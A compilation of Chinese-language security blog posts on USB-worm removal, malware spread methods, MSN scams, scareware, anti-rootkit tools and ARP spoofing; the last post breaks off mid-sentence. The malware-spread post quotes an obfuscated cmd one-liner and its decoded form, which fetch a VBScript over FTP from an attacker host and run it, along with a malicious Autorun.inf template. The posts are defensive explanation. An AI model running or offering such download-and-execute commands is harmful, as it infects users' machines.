[小技巧]為何當使用 IE 8 瀏覽網站時，總會跳出安全性警告視窗？

如果您跟我一樣在使用 IE 8 瀏覽網站時，總是會跳出安全性警告視窗，一定要按下「否」才可以瀏覽圖片時，您可以設定 IE 的相關安全性設定，將 [網際網路選項] 中的 [安全性] 設定，將 [顯示混合的內容]，點選 [啟用]（預設為「提示」），啟用即可。

下方網址為微軟官方圖文教學，若不會可以參考此連結操作

網址：http://support.microsoft.com/kb/971691/zh-tw

[病毒]KAVO 系列（ Kxvo J3ewro ）手動清除

此隨身碟病毒，已經很舊了，大家都知道，目前還有變種eset.exe等等，但解毒位置都大同小異，可以參考此篇文章手動解毒


==================================================================================
一、先行關閉電腦磁碟區的「系統還原」功能。

• 系統還原功能能夠使系統回復到預設狀態，假如電腦的資料毀損，則可以用來復原資料。
• 系統還原功能也會記錄下病毒、蠕蟲或是木馬的感染。Windows 預防任何外部程式來修改系統還原功能，當然也包括了防毒軟體。因此防毒軟體或是工具無法移除系統還原資料夾中的威脅。即使已經在其他的資料夾清除了感染的檔案還是有可能經由系統還原來回復受感染的檔案。

二、下載病毒快速刪除工具：

• kavo_killer（張書維先生製作）[ kavo_killer.rar ]
• EFix（台大批踢踢BBS）[ EFix488.rar ]
  • 執行上述病毒快速刪除軟體，進行下列工作
    • 刪除病毒檔案
    • 關閉病毒相關的的程式
    • 移除病毒所創建的啟動登錄項目
    • 更動要修改的登錄檔
    • 刪除每個硬碟根目錄下與病毒相關的程式

三、進入檔案總管（重點！請勿直接點選「我的電腦」進入各磁碟區）

• 進入「工具」、「資料夾選項」、「檢視」 
  • 點選「顯示系統資料夾的內容」
  • 點選「隱藏檔：顯示所有檔案和資料夾」
  • 取消「隱藏保護的作業系統檔案」
  • 取消「隱藏已知檔案類型的副檔名」

四、使用 CMD 進入 regedit 及 msconfig 檢查相關資訊（確認是否有遺漏）。

• 檢查的 KEYWORD 建議值如下：
• 如有發現下列相關程式時，執行刪除動作。
  • cc.exe
  • ff.exe 
  • j3ewro.exe
  • kxvo.exe
  • nw0t1l0d.exe
  • pagefile.exe
  • taso.exe
  • tava.exe
  • tavo.exe

五、使用檔案總管進入下列資料夾清除相關檔案（通常病毒會偽裝成隱藏、系統檔，所以要特別留意圖示是半透明的）

• %Temp%\
  （清空該資料夾）
• %windir%\
  （清除fly.exe；fly32.dll；poor.exe；poor32.dll）
• %windir%\TEMP\
  （清空該資料夾）
• %UserProfile%\Local Settings\Temp\
  （清空該資料夾）
• %windir%\system32\
  （清除amvo*.dll；amvo.exe；amwo*.dll；amwo.exe；avpo*；vpo.exe；Bitkv*.dll；dnsq.dll；drivers\OLD*.tmp；EXPLORER.EXE；fly.exe；fly32.dll；fool*.dll；goods.exe；ieso*；j3ewro.exe；jvvo*；jvvo.exe；jwedsfdo*；kavo*.dll；kavo.exe；kxvo*；kxvo.exe；mcdcsrv32_080417.dll；mmso*.dll；mmso.exe；mmvo*.dll；mmvo.exe；Msi.exe；mxcdcsrv16_080417.dll；OLD*.tmp；poor.exe；poor32.dll；raidiap*.exe；shareb.exe；taso*.dll；taso.exe；tava*.dll；tava.exe；tavo*.dll；tavo.exe；ubs.exe；winhelp1.exe；winpows.exe）
• %UserProfile%\「開始」功能表\程式集\啟動\
  （刪除此開機啟動資料夾中與啟動不相干的程式）
• %ALLUSERSPROFILE%\「開始」功能表\程式集\啟動\
  （刪除此開機啟動資料夾中與啟動不相干的程式）

六.若上述相關病毒程式及附屬檔案無法刪除時，請下載下列程式進行強制刪除。

• Wsyscheck [ Wsyscheck_v1.68.33.rar ]
  [軟體版本] V1.68.33
  [軟體語言] 繁體中文
  [軟體簡介] 免安裝
   Wsyscheck 是一款手動清理病毒木馬的工具，其目的是簡化病毒木馬的識別與清理工作。
  一般來說，對病毒體的判斷主要可以採用檢查路徑、檢查檔名、檢查檔案建立日期、檢查檔案廠商、微軟檔案驗證、檢查啟動項目等方法，Wsyschck 在這些方面均盡量簡化作業，提供相關的資料供您分析。
  最終判斷並清理木馬取決於您個人的分析，以及對 Wsyscheck 基本功能的熟悉程度。
• IceSword [ IceSword_v1.22.rar ]
  [軟體版本] V1.22
  [軟體語言] 繁體中文
  [軟體簡介] 免安裝
  1、處理序項目中的模組搜尋
  2、登錄檔項目中的搜尋功能
  3、檔案項目中的搜尋功能，分別是 ADS 的列舉 (包含或不包含子目錄)、普通檔案搜尋 (Find Files)
  4、BHO 項目的刪除、SSDT 項目的恢復 (Restore)
  5、 Advanced Scan
  6、隱藏簽章項
  7、其它就是內部核心功能
  
  
  原文連結：http://plog.jxes.tc.edu.tw/lifetype/index.php?op=ViewArticle&articleId=1066&blogId=2

[知識]惡意程式之常見傳播方式

惡意程式之常見傳播方式

在這數位化的時代，
電腦越來越方便，
但是在這方便之中，
確隱藏著許多危機，
許多惡意成是被製造出來，
也一個比一個厲害，
其傳播方式也層出不窮，
以下為大家分享最近各惡意程式常見的傳播方式。

以下圖點擊可放大

(一)網路
1.利用電子郵件傳播
利用釣魚的方式，
引誘對方下載其附件並執行它。
在很久之前，木馬傳播者都以.exe .com .scr 等執行檔引誘別人
接著就進化出 xxxx.jpg.exe ~~等等引誘別人
或著是做成壓縮檔，
但是這樣很容易就被防毒抓到了，
現在又進化出，利用xxx.lnk捷徑 呼叫cmd.exe 利用FTP下載惡意程式，
且可以讓捷徑偽裝成圖檔，讓使用者認為是正常檔案，藉此降低使用者的戒心，
呼叫cmd.exe也可以利用set變數來躲過許多防毒軟體，
其代碼如下
%ComSpec% /c set q= t t.v&set a=z.c&set p=p.g&set h=p -s:z&set n=echo &echo %n%o ft%p%03%a%om^>z>j&echo %n%aa33^>^>z>>j&echo %n%bb33^>^>z>>j&echo %n%get%q%bs^>^>z>>j&echo %n%bye^>^>z>>j&echo ft%h%>>j&echo start t.vbs>>j&ren j s.bat&call s.bat&

整理一下代碼(變數已還原):
cmd /c <=呼叫cmd命令提示字元
echo echo o ftp.g03z.com^>z>j
echo echo aa33^>^>z>>j
echo echo bb33^>^>z>>j
echo echo get t t.vbs^>^>z>>j
echo echo bye^>^>z>>j
echo ftp -s:z>>j <=讀取連接檔 下載t.vbs並執行下載 s.exe d.exe
echo start t.vbs>>j
ren j s.bat
call s.bat

預防方法:
不要隨意開啟別人用信箱寄過來的附件或連結，
開啟前要先詢問寄件者。

2.Yahoo即時通/MSN木馬連結
同樣的利用釣魚方式，
引誘使用者點擊或下載其惡意連結，
最近比較流行的是MSN病毒，
該病毒，如果中了，
只要你上了MSN就會自動對你的所有聯絡人發出帶有病毒連結的惡意訊息~~
Ex:
haha, your PIC?hxxp://ufopyrenees. org/images/view.php?=account@hotmail.com
以上是病毒網址請勿連結(已經過特殊處理)

預防方法:
不隨意開起來自MSN或及時通的可疑帶連結訊息。

(二)硬碟/外接式硬碟
1.透過Autorun.inf自動播放傳播...
此為傳統隨身碟病毒傳播的方式。
該病毒會在你的每個磁區寫入一個病毒主檔+一個Autorun.inf
利用系統硬碟自動播放的功能，
讓使用者開啟硬碟時，
不是開啟硬碟而是開啟病毒主檔，
以此方式入侵到你的系統。
Autorun.inf 的內容
大致上是
[AutoRun]
Open=XXX.EXE
Shell\Open\Command=XXX.EXE
Shell\Explore\Command=XXX.EXE

注:XXX.EXE為病毒執行檔 (副檔名可以是.bat .cmd .scr .pif .vbs 等可執行副檔名)
代表雙擊開啟磁碟會開啟XXX.EXE
對磁碟按右鍵開啟會開啟XXX.EXE
對磁碟按右鍵檔案總管會開啟XXX.EXE

檢測方式，
最簡單的方式，
利用WinRAR開啟你的外接式硬碟
檢查有沒有可疑的執行檔和AUTORUN.INF
例圖:


預防方法:
關閉自動播放
建議是下載安裝Microsoft釋出的補丁KB971029
http://support.microsoft.com/kb/971029
關閉光碟機以外其他磁區的自動播放
並再妮的任何外接式硬碟跟目錄建立一個名為autorun.inf的資料夾~~

2.資料夾病毒
掉包你隨身碟跟目錄的資料夾，
建立假的偽裝資料夾執行檔，
引誘使用者點擊，
檢測方式，
用WinRAR開啟你的磁碟或外接式磁碟，
以下是使用 WinRAR 開啟被感染的隨身碟畫面~

被".exe"資料夾病毒感染的隨身碟...


被".scr"資料夾病毒感染的隨身碟...


被".lnk"(捷徑)資料夾病毒感染的隨身碟...


被"進階"檔案取代式資料夾病毒感染的隨身碟...


預防方式:
進到隨身碟裡面
按檢視 > 選擇 詳細資料


如果被別的電腦感染了，
請先暫時不要碰那些偽裝的資料夾，
可以下載FolderFix修復
http://www.wretch.cc/blog/krichard95/15727032

3.檔案感染
感染所有磁區.exe可執行檔
預防方法建議存放於隨身碟中的EXE檔案，
都把他們壓縮起來，
這樣子可以減少隨身碟在外，受到別台電腦的感染。

以上為目前比較常見的惡意程式傳播方式～
如有不足的地方，歡迎大家提供。

也歡迎大家轉貼...
但是請注明出處唷~~

By K.Richard

原文連結：http://www.wretch.cc/blog/krichard95/15812444

[news]MSN假網友 詐借門號認證

謊稱手機螢幕故障

〔記者王昶閔、黃敦硯／台北報導〕「我的手機螢幕壞了，可否請您幫我收個簡訊？」如果好友突然在MSN上這樣向你求救，可得提高警覺，因為這個友人可能是詐騙集團化身，目標是你的手機門號，好心幫忙，下場不是荷包失血，就是成了人頭戶！


網路上傳出有詐騙集團盜用民眾MSN帳號，利用拍賣網站帳號申請機制，或以電信業者小額付費，騙取手機門號與認證碼，藉以從事不法。小陳就有類似經驗，一位久未見面的好友突然上線，透過MSN跟他寒暄幾句後，以手機螢幕壞掉為由，希望小陳協助代收簡訊，並轉述內容。

小陳爽快地將手機號碼以MSN傳給對方，不久手機就傳來一封簡訊，內容是一組數字與英文認證碼，他將這組密碼透過MSN轉述給好友，事成後對方就匆匆下線。


小陳越想越不對，直接打電話向友人求證，才發現友人的MSN帳號早遭到駭客盜用，自己很可能是遇上了詐騙集團，擔心自己成了人頭戶。


165反詐騙專線表示，詐騙集團是先以駭客方式入侵民眾電腦，竊取MSN帳號密碼，再冒網友名義騙其友人信任，這類案件是近2個月新興詐騙手法，最近每週都接獲10至15名網友報案被騙，民眾不得不防。


冒用MSN的詐騙犯罪，通常有2種手法，一是假冒本尊與親友閒話家常，歹徒再謊稱有事無法出門，要親友到超商代買遊戲點數，等被害人告訴對方購買遊戲點數的序號與密碼，對方卻沒把錢匯入，才知被騙，最近有多位藝人的經紀人都因此上當；另一種是告知手機螢幕壞掉，請網友提供手機代收認證碼簡訊。


165呼籲民眾，若接到朋友以MSN或電子郵件拜託做一些奇怪的事，最好打電話跟友人確認，不要只憑MSN連絡。

新聞出處網址：http://tw.news.yahoo.com/article/url/d/a/100427/78/24m3s.html

[病毒]Anti-rootkit工具介紹

Anti-rootkit工具介紹
文／圖吳俊達．責任編輯／陳啟川

本篇為Rootkit文章的最後一篇，在探討過user mode與kernel mode的rootkit技術後，本次將介紹一些Anti-rootkit的工具，最後再以實例說明的方式，讓讀者在了解rootkit的技術原理後，更能進而加以防範。

---

在說明了這麼多rootkit技巧之後，您是否也心驚膽跳，懷疑自己的電腦上是否已被人神不知鬼不覺的種入rootkit了？沒關係，現下就為讀者們介紹各個Anti-rootkit的工具。
RootkitBuster
http://www.trendmicro.com/download/rbuster.asp
Trend Micro於2006年底便在官方網站上免費提供給廣大的電腦用戶使用，它具有偵測隱藏檔案、登錄檔、執行程式及驅動程式的能力，並在2.2版中新增偵測隱藏開機磁區的功能。因為在2008年年初，開機磁區 (MBR) rootkit大為肆虐，Trend Micro發現到此一現象，隨即開發新版RookitBuster以解決電腦用戶的困擾。它可偵測到user mode及kernel mode的rootkit，並用Cross-View比較的模式明白告訴使用者，那些資料是隱藏，方便使用者清除的動作。


RookitBuster的使用者介面。

RootkitBuster也提供清除能力。當它掃描到隱藏元件時，將顯示在Scan Results中，使用者從中選擇隱藏的檔案或是登入檔，並按下「Delete Selected Items」的按鍵時，它將自動刪除所選的元件。


將Scan Results中的項目反白選取再按下Delete Selected Items即可刪除。


IceSword
http://pjf.blogcn.com/index.shtml
IceSword是一套來自中國，功能相當齊全的系統監測工具，目前已經最新的版本是1.22版，我們將著重其Anti-rookit的功能來做介紹。在functions中可檢視到隱藏的資料，例如Process、Port及Service，它將以紅色標示做為隱藏資料的標記。


IceSword的UI，紅色代表為隱藏的Process。

從中可看到此執行程式的檔案位址，首先先選到此程式，並按右鍵，便可看到可對此程式做的操作，選擇終止此程式的執行。


選取後按右鍵即可中止該隱藏Process。


Gmer
http://www.gmer.net/index.php
GMER也是一套系統監測工具，除了rootkit偵測功能外，它還有顯示自動啟動的程式、內建CMD及登入檔編輯器。剛啟動GMER時它會先快速掃描系統上是否有隱藏資料，如果有任何可疑程式，它會要求完整掃描。


GMER的UI和IceSword很像，但更為簡潔。

然後在掃描結果上選取process或file即做清除的動作。


一樣按隱藏項目上按右鍵即可刪除或中止。

但是否使用以上rootkit偵測刪除軟體就可免除其威脅呢？其實不盡然，因為rootkit所隱藏的資料不一定是它的本體，只清除那些資料，並不能保證已經除去源頭，所以必須搭配上其他防毒技術，找出真正元凶加以清除，以防其又捲土重來。

由前文可知rootkit的目的在於隱藏資料，避免使用者的發現，更避開防毒軟體的偵測，當使用者或是防毒軟體想要去操作這些資料時，rootkit便回報此資料不存在或是操作失敗；一般沒有Anti-rootkit技術的防毒軟體就會被欺騙，導致找不到已存在的病毒檔。所以目前大多數防毒軟體都具備Anti-rootkit的技術，以突破rootkit的保護層不受其欺騙，直接對被rootkit保護的程式、檔案及登入檔進行操作，清除有害程式對系統造成的傷害，達到全面性的防護。


真實世界的案例Ⅰ－FuTo
看完了上述所介紹rootkit在kernel、user mode用到的各種技巧，接下來讓我們看一個實際的例子─FuTo。許多rootkit因為執行在系統核心，所以常被惡意軟體用來隱藏自己不被防毒軟體偵測到。FuTo是個相當有名的rootkit，它使用了出色的技術來達到隱藏Process、Driver以及修改Process的執行權限。下圖是FuTo執行的功能選項。可以注意到其中的msdirectx.sys即是FuTo的Driver，許多rootkit會將Driver檔案名稱取成類似正常的Driver名稱。


FuTo的Driver名稱容易讓人誤會為正常的Driver。


FuTo的行為分析
FuTo以DKOM技術來隱藏Process以及Driver，也就是說藉由修改Windows核心的資料架構隱藏資料。在隱藏Process這部分，FuTo主要修改了三個地方：Active Process List、Csrss.exe以及PspCidTable。

Windows核心使用Active Process List（可將其想像成一個將系統上所有Process串起來的linked-list）來儲存系統中的Process資訊（少數系統Process不在其中）。FuTo依序追蹤此List，如果找到要隱藏的Process，便將前後兩個鄰近的Entry修改略過要隱藏的Process。Win32 API提供的Process列舉便是追蹤此List，所以修改Active Process List即可讓Win32 API列舉不到被隱藏的Process。

Csrss.exe（Windows上一個極為重要的Process，在此不多行描述，有興趣的讀者請自行參閱MSDN）內含一個表格，儲存幾乎所有系統內的Process資訊，FuTo會試著找到此表格並且將要隱藏的Process從此表格移除，以達到隱藏的目的。

PspCidTable是Windows核心裡的一個表格，它儲存著幾乎所有Process和Thread的指標。FuTo會移除掉在此表格裡面跟要隱藏的Process資料。

FuTo在隱藏Driver的方法是修改Windows核心中的Module Loaded List，這個List跟Active Process List是同一種類的List。FuTo利用修改Active Process List的方法修改此List，以達到隱藏Driver的目的。


FuTo的行為分析
現下我們利用FuTo試著來隱藏指定的Process，看看是否真能讓該Process消失在工作管理員的Process清單


被FuTo隱藏起來的Notepad.exe，PID為1964。

一般Malware不會有GUI，但為了方便展示，我們使用Notepad.exe來展示FuTo隱藏Process的功能。上圖是利用FuTo隱藏Notepad.exe之後的結果，可發現下工作管理員已經看不到PID為1964的Notepad.exe。


RootkitBuster掃描到有隱藏Porcess，注意PID被FuTo改為0。

接下來使用TrendMicro的Antirootkit工具RootkitBuster來偵測，如圖9，可得知該Process已被RootkitBuster偵測到，這裡可以注意到該Process的PID已經被FuTo改成0了。


利用FuTo隱藏它自己的driver。

接下來利用FuTo將msdirectx.sys隱藏，如圖10。接著再使用RootkitBuster偵測隱藏的Driver，在圖11中可發現被隱藏的Driver。


RootkitBuster依然能找到被隱藏的driver。


Cross-View比對偵側
RootkitBuster如何能偵測到被隱藏的Process或Driver呢，不是都被FuTo給抹掉痕跡了嗎？事實上，作業系統裡這種記載系統上所有Process、Driver的資料架構有許多個，FuTo只改掉了其中的一部份。因此，只要拿FuTo更改部份所得到的Process或Driver清單，和從其它系統核心得到的Process或Driver清單兩相比較，若有出入，必然是因為系統上有rootkit在搞鬼，而這種方法被稱之為Cross-View。


真實世界的案例Ⅱ－MBR rootkit
在2005年有兩位資安研究員Derek Soeder和Ryan Permeh發現了一個嚴重的安全漏洞－Windows並沒有保護好MBR（Master Boot Record，硬碟上第一個磁區，其內包含了電腦在開機過程中會執行到的程式碼，是一個十分重要的地方），以致惡意程式可以在user mode對MBR任意進行修改。事實上修改MBR這個技巧在早期的DOS時代就已常被利用，但這次兩位研究者的發現則是第一次正式公開證實Windows NT（包含Vista）環境下依然有此漏洞。


MBR在開機程序中的運作。
在進一步了解MBR rootkit之前，我們得先對MBR以及它在開機過程中的角色有個基礎認知。一般正常系統開機的流程如下所述︰

1. 按下電源，電腦開機，BIOS進行開機自我測試(Power-on self test)。
2. BIOS依據開機裝置順序，讀入該裝置位在MBR內的程式碼(Bootloader)，將控制權交給它。
3. Bootloader將開機分割區 (例如C槽) 的第一個磁區讀入記憶體，將控制權交給它(kernel loader)。
4. Kernel loader讀入作業系統的核心(kernel)，並將控制權交給它來完成開機。



正常的開機程式。

由以上?述我們可以得知，MBR是開機流程中最早被執行的（甚至比OS更早）。因此，只要惡意程式篡改了MBR中的code，便可以對系統得到最大的控制權。


MBR rootkit行為分析
接下來，我們以MBR rootkit的sample實際感染一台系統，來觀察MBR rootkit到底有些什麼侵害系統的行為。以下將MBR rootkit分幾個構成來分析：


MBR rootkit installer
當使用者在不小心執行了包含了MBR rootkit的惡意程式之後，該程式就會修改MBR的內容，讓電腦在重開機後能自動讀入MBR rootkit，由圖13可以清楚看到惡意程式正對MBR內容做篡改。


透過監視installer的行為發現到它對MBR的更動 (Offset 0)。


被修改的MBR
模式，更改BIOS中斷0x13（對於硬碟存取的相關功能）處理常式，藉此來影響Windows NT家族的kernel loader－NTLDR，控制它讀取剛剛installer預先寫在系統硬碟上的幾個磁區（裡面放的是一些惡意程式碼），並對Windows的核心做inline patching，載入負責後門程式部份的核心驅動程式。一旦成功執行後，MBR的內容就不再是原本單純bootloader。被修改的MBR會以前面所述IDT hooking


MBR rootkit的自我保護
除了更改Windows核心，IDT hooking等等，MBR rootkit更用了其它的模式來保護自己不被發現。誠如上面所述，MBR rootkit的第一步就是修改受害者電腦上的MBR，因此，勢必要想辦法隱瞞防毒軟體的偵測，就是不能讓防毒軟體知道自己修改過MBR。它所使用的方法就是dispatch routine hook。藉由將最底層的disk.sys（直接負責所有對硬碟的存取）驅動程式「讀」與「寫」的routine給替換掉，便可確保自己不會被發現。當防毒軟體試著要讀取MBR時，便傳回MBR修改前的內容（installer會事先藏在硬碟上的某幾個磁區）；而掉包的「寫入」routine，則可以保護MBR不再被其他人更改。


Disk.sys的dispatch routine已被MBR rootkit更改。


MBR rootkit的偵測
經過前面的描述之後，我們可以知道MBR rootkit將它的魔手深入了Windows的核心，因此一般防毒軟體無法偵測到它，任何對MBR的存取都會經過它的修改。但這不代表MBR rootkit就可以高枕無憂。透過其它Windows核心驅動程式的能力（例如: classpnp.sys），我們便可以直接讀取MBR的內容，並將它與直接讀取時的內容做個比較；若兩者不同，便可得知其中必定是有MBR rootkit在作祟。


MBR rootkit的偵測流程


MBR rootkit小結
對於MBR rootkit的技巧手法與偵測方法，至此我們已有個大致了解。事實上IBM PC第一支被正式記載的病毒名叫Brain，亦是採用hook IDT 0x13的方法感染MBR做破壞，而MBR之所以那麼吸引病毒作者，就是因為它具備了下列優點：

1. MBR code對系統具有完全的控制，它比任何一款防毒軟體都還早被載入RAM，甚至比作業系統更早，因為它是開機流程的一部份。
2. MBR rootkit不需要檔案系統，它直接對硬碟的磁區做存取，減少被偵測到的機率。
3. MBR rootkit不需要更改系統的機碼(Registry)來達到自動重啟(Survive after reboot)的效果，因為它是直接被BIOS載入RAM。


rootkit的發展趨勢
隨著技術的發展，rootkit具有如下一些發展趨勢︰
1. 利用硬體來隱藏rootkit︰例如已有rootkit研究者提出基於CPU本身的系統管理模式(System Management Mode, SSM)實現rootkit隱藏行為、基於顯示卡和網路卡來隱藏的rootkit程式等，以進駐到作業系統更深層次的位置或者利用現有檢測技術的盲點進行隱藏。

2. 目標型隱藏︰ rootkit將針對特定的rootkit檢測程式進行特定的處理來實現隱藏的目的。這類rootkit通常將會識別特定rootkit檢測程式，並利用檢測程式實現上的漏洞來達到隱藏目的。

【原文刊載於RUN!PC雜誌：2009年2月號】

原本出處：http://www.runpc.com.tw/content/main_content.aspx?mgo=181&fid=G01 

[資安]ICS(資通安全資訊網) 製作的「如何避免資安危機動畫」

此網頁有ICS(資通安全資訊網) 製作的「如何避免資安危機動畫」共有下列四則

資訊資產之重要性

網路新興攻擊

駭客攻擊與入侵

決策主管對資訊風險應有的認識與責任

連結網址：http://ics.stpi.org.tw/Animation/security_web/

[news]McAfee防毒軟體升級出錯 導致電腦大癱瘓

更新日期:2010/04/22 14:05

全球知名的防毒軟體公司邁卡菲（McAfee）的軟體升級過程中出了問題，進而導致包括智利和美國等很多國家政府部門惑企業的電腦陷入癱瘓。

邁卡菲防毒軟體這一軟體升級的缺陷，會讓升級的電腦進入不斷的重複開機狀態。即使重開機循環停住了，這台電腦也會失去連接網路的能力。邁卡菲現在已經暫停軟體升級，並在公司網頁上提供解決問題的辦法。

智利司法部門最初曾對外表示，他們的電腦網路在開始對防毒系統進行自動更新後，帶來「不知名病毒」的入侵，只要是當天啟動了更新程序的電腦，都全部陷入癱瘓，造成司法系統的數據資料庫無法使用，進而影響到審案，很多案件不得不延後審理。

稍後軟體公司邁卡菲McAfee承認，是因為他們的防毒軟體升級過程中的一個缺陷，造成更新的電腦系統癱瘓。

除智利司法部門外，世界各地也都有McAfee軟體用戶，遇到同樣的問題，包括美國的公司、醫院和學校。

新聞出處：http://tw.news.yahoo.com/article/url/d/a/100422/1/24cfi.html

網路安全公司McAfee21日進行例行的病毒碼更新，不料更新檔把微軟視窗（Windows）作業系統一個有效的檔案誤為病毒，造成全球為數不詳的電腦當機。
法新社報導，受到影響的主要是微軟公司Windows XP Service Pack 3作業系統用戶。做了更新的電腦，其Windows作業系統一個有效的系統檔案會被當成病毒，電腦因此會不斷重新開機，且無法與網路連接。

全美的大學、醫院、工商企業均有人提出抱怨。網路問題監督公司網路風暴中心（The Internet Storm Center）說，他們收到多達100件投訴。風暴中心說，有些機構有數千部電腦當機，有些機構則是完全停止運作，直到問題解決。

McAfee已提供一個可以防止「偵測錯誤」的更新檔，讓使用者重新更新。目前不清楚有多少電腦受害，估計有數萬台。McAfee估計受害者，占他們消費者百分之零點五不到。

密西根大學的網站說，學校2萬5000部電腦有8000部受影響。雪城大學醫院的6000部電腦有2500部當機。

新聞出處：http://www.worldjournal.com/view/full_news/7169892/article-%E6%9B%B4%E6%96%B0%E7%97%85%E6%AF%92%E7%A2%BC-%E9%9B%BB%E8%85%A6%E4%B8%8D%E6%96%B7%E9%87%8D%E9%96%8B%E6%A9%9F-?instance=noon3

[news]駭客大本營烏克蘭

駭客大本營烏克蘭

    　位在烏克蘭首都基輔工業區的Innovative Marketing Ukraine（IMU）公司，堪稱駭客大本營。他們吸收數百名學有專精的電腦高手，當中多為在學的大學生，開發出堪稱全世界殺傷力最強且最有賺頭的電腦病毒，表現最好的可獲得高額獎勵，利慾薰心下，讓這群年輕人無視自己設計的軟體所帶來的危害。

    　美國聯邦貿易委員會（FTC）去年便控訴烏克蘭這家網路公司，指他們利用偽裝成防毒軟體的惡意程式「恐嚇軟體（Scareware）」詐騙，假借付費掃毒名義騙取受害者的信用卡資料，甚至移除合法的防毒軟體釀成資安漏洞。Scareware這類流氓軟體可謂現今最猖獗的網路詐騙手法，估計全球每月約有3,500萬台電腦受害，網路罪犯每年不法獲利超過4億美元。

    　坐擁高薪 道德甩一邊

    　曾在IMU擔任程式設計師、現於基輔銀行工作的馬克斯姆表示，「當你還只是20多歲的年輕小伙子，不會想太多道德問題。我的待遇優渥，而且我知道大部分員工都坐擁高薪。」

    　IMU的犯罪足跡遍及東歐、巴林、印度、新加坡和美國。防毒軟體製造商邁克菲研究人員耗費數月調查IMU的營運情況，據其估計2008年IMU營收約1.8億美元，至少在24國散布惡意程式牟利。

    　IMU的賺錢法寶就是他們研發的偽防毒軟體Scareware，這種程式佯裝替電腦掃描病毒，然後告訴用戶他們的電腦中毒，繳交50到80美元即可協助殺毒，但這只是IMU引人上鉤的伎倆，目的在誘使受害人主動提供信用卡資料，再將這些信用卡個資高價轉賣給有心人士。受害人付費後，病毒看似消失，其實部分電腦已被植入其他惡意程式。

    　IMU這類網路犯罪集團開發出Scareware等惡意病毒遂行詐財，但將散布工作交給外頭的駭客，電腦一旦受到感染就無法運作，連電腦安裝的賽門鐵克（Symantec）、邁克菲（McAfee）和趨勢科技（Trend Micro）等合法防毒軟體都遭移除，造成任由駭客攻擊的資安漏洞。

    　據歐洲第一大資安軟體領導廠商Panda Security估計，全球每月有3.5％、約3,500萬台個人電腦遭「恐嚇軟體」等惡意程式侵襲，每年帶給網路罪犯的不法利益超過4億美元。協助FTC打擊網路犯罪的律師亞倫森（Ethan Arenson）表示，「把消費者修理或換新電腦的花費算在內，總體損失恐怕要比已被騙掏出口袋的錢多得多。」

    　防毒軟體防不了惡意程式

    　全美擁有24家據點的個人電腦維修公司Geek Choice，現在營收最大來源就是幫客戶清除「恐嚇軟體」，收費從100到150美元不等，求助這項服務的來電占了3成。Geek Choice執行長布魯烈（Lucas Brunelle）指出，「恐嚇軟體」日新月異，過去幾個月來這類惡意軟體攻擊案例層出不窮。

    　防毒軟體業者看準這方面業務的獲利商機，紛紛加入清除電腦病毒行列，但也凸顯其產品的防毒成效不彰。

    　電腦駭客常透過具匿名性的網路聊天室，與開發「恐嚇軟體」的業者搭上線聯手犯罪。駭客負責將「恐嚇軟體」植入個人電腦，每1,000台可獲取6到180美元的報酬，至於手法無所不用其極，包括劫持合法網站、虛設網站散播病毒，或是攻擊臉書（Facebook）或推特（Twitter）等熱門社交網站。

    　像去年9月「恐嚇軟體」業者曾以紐約時報網站，作為散播惡意軟體的管道。駭客化身為網路電話公司Vonage，付費在紐時網站刊登廣告，不知情的線上讀者一旦點閱，電腦便中招感染病毒。

    　駭客為引受害人落入陷阱，也會試圖操控搜尋引擎Google，讓他們虛設的網站在特定主題搜尋結果中名列前茅。例如他們會利用奧斯卡得獎名單或老虎伍茲性醜聞等新聞熱潮，迅速架設網站以增加被搜尋點閱的機會。

    　Panda Security去年就觀察到，某「恐嚇軟體」業者竟佈下天羅地網架設100萬個網頁，搜尋福特汽車零件的網友誤蹈陷阱，感染偽防毒軟體MSAntispyware2009，他們也會透過臉書和推特發送惡意連結，引誘受害人自投羅網。

新聞出處：http://news.chinatimes.com/CMoney/News/News-Page-content/0,4993,11050705+122010041800199,00.html

[iThome]ARP掛馬－－新的區網隱形殺手

當使用者瀏覽器無故被導引至其他網站，假如不是DNS出問題，很有可能是所謂的ARP掛馬，這讓區域網路安全亮起了紅燈。

在2009年3月5日起，在各大論壇有許多人反映，連至ZDNet、CNET甚至MSN網站時，發生了一些異常行為，例如瀏覽器突然遭到被導引至其他網 站，像是www.dachengkeji.com、www.dachengkeji.cn/article/index.htm。 此時，網路上便開始有人追查相關原因。許多網友與網路安全專家自行推敲後，分析出幾個結果︰有人說是DNS被影響，但後來幾起測試利用IP直連，也會出現異狀；他們仔細觀察封包分析結果後，發現DNS回應也都正確，因此認為不會是這方面的問題。 後來一些有耐心的人又花了很多力氣，把封包截取下來分析，看到特定封包是突然被「插」進來的，他們仔細分析了中間的路徑後，懷疑是中華電信路由器被「黑」，或認為中間有IT設備受到入侵，然後使得駭客可以插入封包。 在接觸過此類手法的專家看來，他們懷疑整起事件為ARP掛馬的機率極高。不論這事件的原因是什麼，這類手法其實很值得重視，為了讓你能更熟悉這種威脅的運作方式，接下來我將整理一些相關基本資訊。 甚麼是ARP？ 在802.3 乙太網路架構下，區域網路中使用CSMA/CD方式，這種廣播（Broadcast）的傳輸方式，多數人應該都很熟悉，當某主機需要傳送資訊給某IP位址時，會先發送ARP(Address Resolution Protocol，位址解析協定)封包，詢問網路上誰擁有這個IP的MAC位址，而採用該IP的電腦，一旦聽到這樣的詢問，便會回應給來源電腦，以便後續的資料傳送。 ARP request、ARP reply，以及ARP cache 我們了解到主機利用ARP查詢的方式，來獲得 IP 位址和實體位址的對應。而發出詢問的封包就叫做ARP request（它是封裝成廣播封包的形式），因此區域網路內所有電腦都會收到此一封包，而比對ARP request的IP位址後，只有該IP的電腦會回覆ARP reply封包──將這些資料傳給原本發出ARP request的主機。 但主機總不可能每次傳輸都要去問一次別人的MAC位址，因此為了減少ARP request廣播封包，進而降低網路負擔，電腦主機會將曾經查詢過的網路裝置IP位址/MAC位址，記錄在主機裡。 說到這，聰明的人就知道這中間有甚麼可以玩了。如果你有辦法跟對方說，你就是某臺主機，它就會相信，而一切只要靠ARP來騙就可以。 一般當你「黑」進一臺電腦A，就算是A處於交換器環境底下，靠以前的Sniffer工具，是無法聽到交換器上其他網路埠的流量(假設另一個網路埠上有一臺主機B)。 可是若你使用ARP，騙B說A是閘道，這樣B的流量就會先經過A，A再轉閘道，這樣就是所謂的中間人攻擊（Man-in-the- middle），你就可以在交換器環境底下竊聽。當然對於駭客來說，竊聽還不夠，既然網路封包都流過來了，乾脆改一改再轉送，這就達到竄改的目的。 這些不需要什麼高深的TCP/IP理論，也不需要去算TCP的流水號，一切都很簡單。而且中國網站上已經很多有這樣的ARP工具讓人下載，很多小駭客甚至都已經玩到相當熟練了。 Cain & 